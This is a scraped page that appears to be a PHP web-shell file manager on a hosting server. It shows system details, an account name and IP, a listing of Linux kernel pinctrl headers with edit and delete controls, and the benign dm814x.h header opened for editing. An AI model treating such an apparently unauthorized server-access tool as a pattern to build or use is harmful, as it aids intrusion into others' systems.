[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
dt-bindings
/
pinctrl
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 am33xx.h
1,043 B
SET
[ EDIT ]
|
[ DEL ]
📄 am43xx.h
1,758 B
SET
[ EDIT ]
|
[ DEL ]
📄 at91.h
1,245 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcm2835.h
911 B
SET
[ EDIT ]
|
[ DEL ]
📄 brcm,pinctrl-stingray.h
2,718 B
SET
[ EDIT ]
|
[ DEL ]
📄 dm814x.h
1,277 B
SET
[ EDIT ]
|
[ DEL ]
📄 dra.h
2,693 B
SET
[ EDIT ]
|
[ DEL ]
📄 hisi.h
2,069 B
SET
[ EDIT ]
|
[ DEL ]
📄 keystone.h
1,167 B
SET
[ EDIT ]
|
[ DEL ]
📄 mt6397-pinfunc.h
13,432 B
SET
[ EDIT ]
|
[ DEL ]
📄 mt65xx.h
1,210 B
SET
[ EDIT ]
|
[ DEL ]
📄 mt7623-pinfunc.h
32,417 B
SET
[ EDIT ]
|
[ DEL ]
📄 nomadik.h
758 B
SET
[ EDIT ]
|
[ DEL ]
📄 omap.h
3,076 B
SET
[ EDIT ]
|
[ DEL ]
📄 pinctrl-tegra-xusb.h
240 B
SET
[ EDIT ]
|
[ DEL ]
📄 pinctrl-tegra.h
1,466 B
SET
[ EDIT ]
|
[ DEL ]
📄 qcom,pmic-gpio.h
5,402 B
SET
[ EDIT ]
|
[ DEL ]
📄 qcom,pmic-mpp.h
2,721 B
SET
[ EDIT ]
|
[ DEL ]
📄 r7s72100-pinctrl.h
517 B
SET
[ EDIT ]
|
[ DEL ]
📄 rockchip.h
1,571 B
SET
[ EDIT ]
|
[ DEL ]
📄 samsung.h
2,481 B
SET
[ EDIT ]
|
[ DEL ]
📄 stm32-pinfunc.h
814 B
SET
[ EDIT ]
|
[ DEL ]
📄 sun4i-a10.h
2,606 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: dm814x.h
/* SPDX-License-Identifier: GPL-2.0 */ /* * This header provides constants specific to DM814X pinctrl bindings. */ #ifndef _DT_BINDINGS_PINCTRL_DM814X_H #define _DT_BINDINGS_PINCTRL_DM814X_H #include <dt-bindings/pinctrl/omap.h> #undef INPUT_EN #undef PULL_UP #undef PULL_ENA /* * Note that dm814x silicon revision 2.1 and older require input enabled * (bit 18 set) for all 3.3V I/Os to avoid cumulative hardware damage. For * more info, see errata advisory 2.1.87. We leave bit 18 out of * function-mask in dm814x.h and rely on the bootloader for it. */ #define INPUT_EN (1 << 18) #define PULL_UP (1 << 17) #define PULL_DISABLE (1 << 16) /* update macro depending on INPUT_EN and PULL_ENA */ #undef PIN_OUTPUT #undef PIN_OUTPUT_PULLUP #undef PIN_OUTPUT_PULLDOWN #undef PIN_INPUT #undef PIN_INPUT_PULLUP #undef PIN_INPUT_PULLDOWN #define PIN_OUTPUT (PULL_DISABLE) #define PIN_OUTPUT_PULLUP (PULL_UP) #define PIN_OUTPUT_PULLDOWN 0 #define PIN_INPUT (INPUT_EN | PULL_DISABLE) #define PIN_INPUT_PULLUP (INPUT_EN | PULL_UP) #define PIN_INPUT_PULLDOWN (INPUT_EN) /* undef non-existing modes */ #undef PIN_OFF_NONE #undef PIN_OFF_OUTPUT_HIGH #undef PIN_OFF_OUTPUT_LOW #undef PIN_OFF_INPUT_PULLUP #undef PIN_OFF_INPUT_PULLDOWN #undef PIN_OFF_WAKEUPENABLE #endif